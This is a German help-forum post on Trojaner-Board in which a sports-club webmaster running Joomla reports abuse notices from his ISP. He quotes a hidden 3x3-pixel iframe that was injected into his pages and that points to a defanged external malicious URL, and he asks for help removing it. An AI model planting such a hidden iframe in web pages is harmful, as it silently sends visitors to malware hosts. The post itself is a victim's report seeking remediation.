Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Fremdes Script auf der Webseite

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 16.11.2012, 10:18   #1
pa7934
 
Fremdes Script auf der Webseite - Frage

Fremdes Script auf der Webseite



Hi, ich betreibe einige Webseiten für einen Sportverein. Dazu benutze ich Jommla 1.5.27.. Das lief bis vor kurzem alles Prima. Seit einiger Zeit bekomme ich von der Telekom (ABUSE) Hinweise, dass von meinen Router aus (angeblich meine IP Adresse), verschiedene Rechner angegriffen werden um Daten, Passwörter etc. aus zu Spionieren. Somit habe ich zunächst die PW am Router, WLan, und auch meine EBay, Bankdaten etc. geändert. Einen vollständigen Scan mit Avira Internet Securita gemacht. Alles ohne Befund -
Laut Telekom haben die meinen EMail Verkehr eingeschränkt (Abuse-Team).
Ich sollte noch mit gmet und Malwarebytes meinen Rechner Scannen. Das ist auch jeweils ohne Befund passiert. Ich habe mir darauf hin Malwarebytes in der Vollversion gekauft und lasse es jetzt in der Kombination mit Avira laufen. - Kein Befund - Jetzt habe ich auf meinen Webseite folgendes gefunden: Am besten sieht man es mit Firefox. Links oben befinden sich weisse Kästchen. Beim Überstreichen und anklicken der rechten Maustaste (Quelltext i.d. Markierung anzeigen) erscheint dort ein Script in einem IFrame, worin wechselnde Inhalte, teilweise mit Verzweigung in Richtung xxx.ru gehen.

Beispiel: z.Zt. nicht nach .ru sondern ....

<iframe src="hxxp://ohmsd.sellClassics.com/doubleclickingsygate.cgi?8" align="middle" frameborder="no" height="3" scrolling="auto" width="3"></iframe>

Dieses IFrame habe ich nicht eingebaut, es erscheint auch nicht in der index.php

Schaut mal selber unter www.reds-bremerhaven.de oder www.oscfussball.de

Wie gesagt mit Firefox. Beim IEX steht das Script (weisser Balken in der Mitte).

Für Hinweise oder Hilfe wäre ich Dankbar.

MFG
Michael

Antwort

Themen zu Fremdes Script auf der Webseite
abuse-team, anzeige, anzeigen, avira, besten, ebay, eingeschränkt, email, folge, gekauft, iex, internet, ip adresse, klicke, links, malwarebytes, maus, ohne befund, passwörter, rechner, router, scan, script, telekom, webseiten, wlan



Ähnliche Themen: Fremdes Script auf der Webseite


  1. Fremdes benutzerkonto auf Win8 Laptop
    Plagegeister aller Art und deren Bekämpfung - 07.01.2015 (6)
  2. Fremdes Benutzerkonto unter Win8.1
    Plagegeister aller Art und deren Bekämpfung - 28.12.2014 (19)
  3. Mithilfe der Festnetznummer sich in ein fremdes System einhacken?
    Überwachung, Datenschutz und Spam - 18.10.2014 (1)
  4. Kurzzeitig zweites (fremdes) Heimnetzwerk (Win 7) und keine Internetverbindung mehr
    Plagegeister aller Art und deren Bekämpfung - 25.09.2014 (6)
  5. Viren Trojaner Befall, fremdes Icon in Task leiste ohne Reaktion
    Log-Analyse und Auswertung - 03.03.2014 (1)
  6. HEUR:Trojan.Script.Generic auf meiner Webseite
    Plagegeister aller Art und deren Bekämpfung - 06.01.2014 (1)
  7. Fremdes Log-File eingebaut
    Plagegeister aller Art und deren Bekämpfung - 25.07.2013 (37)
  8. Mit dem Titel "Click to Continue by Browse to Save" öffnen sich im Internet-Browser ein fremdes Werbefenster
    Plagegeister aller Art und deren Bekämpfung - 11.04.2013 (5)
  9. wlan netz jemand fremdes
    Überwachung, Datenschutz und Spam - 20.01.2013 (2)
  10. Jemand fremdes steuert mein Laptop!
    Log-Analyse und Auswertung - 20.11.2012 (3)
  11. Mein Pc ruft ständig ein fremdes Netzwerk ("nicht identifiziertes Netzwerk")
    Log-Analyse und Auswertung - 17.10.2012 (16)
  12. Rechner spielte fremdes Audio ab. Rechner jetzt sauber?
    Log-Analyse und Auswertung - 03.09.2012 (1)
  13. Fremdes JavaScript auf eigener Internetseite: absrbwa() !
    Plagegeister aller Art und deren Bekämpfung - 21.05.2011 (4)
  14. Fremdes programm greift auf mein Pc zu
    Log-Analyse und Auswertung - 10.03.2011 (1)
  15. Zugriff auf fremdes 1&1-SmartDrive-Laufwerk
    Nachrichten - 13.12.2010 (0)
  16. Fremdes E-mail Versende Programm
    Plagegeister aller Art und deren Bekämpfung - 20.02.2008 (6)
  17. fremdes WLAN ungeschuetzt- soll man sich darum kuemmern?
    Diskussionsforum - 29.08.2006 (16)

Zum Thema Fremdes Script auf der Webseite - Hi, ich betreibe einige Webseiten für einen Sportverein. Dazu benutze ich Jommla 1.5.27.. Das lief bis vor kurzem alles Prima. Seit einiger Zeit bekomme ich von der Telekom (ABUSE) Hinweise, - Fremdes Script auf der Webseite...
Archiv
Du betrachtest: Fremdes Script auf der Webseite auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.